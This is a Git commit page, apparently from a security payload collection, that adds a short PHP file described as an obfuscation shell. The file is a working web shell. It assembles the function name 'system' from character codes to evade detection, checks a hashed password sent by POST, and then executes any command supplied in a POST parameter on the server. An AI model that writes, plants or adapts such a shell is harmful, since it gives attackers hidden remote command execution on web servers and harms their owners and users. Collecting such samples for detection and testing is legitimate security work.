Merge pull request #122 from q-analysis/patch-1

Added An Obfuscation Shell
This commit is contained in:
Daniel Miessler 2018-03-04 12:26:44 -08:00 committed by GitHub
commit 2f92098370
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,22 @@
<?php
$pass = "9cdfb439c7876e703e307864c9167a15"; //lol
$A = chr(0x73);
$B = chr(0x79);
$X = chr(0x74);
$D = chr(0x65);
$E = chr(0x6d);
$hook = $A.$B.$A.$X.$D.$E;
if($pass == md5($_POST['password']))
{
$hook($_POST['cmd']);
}
else
{
die();
}
?>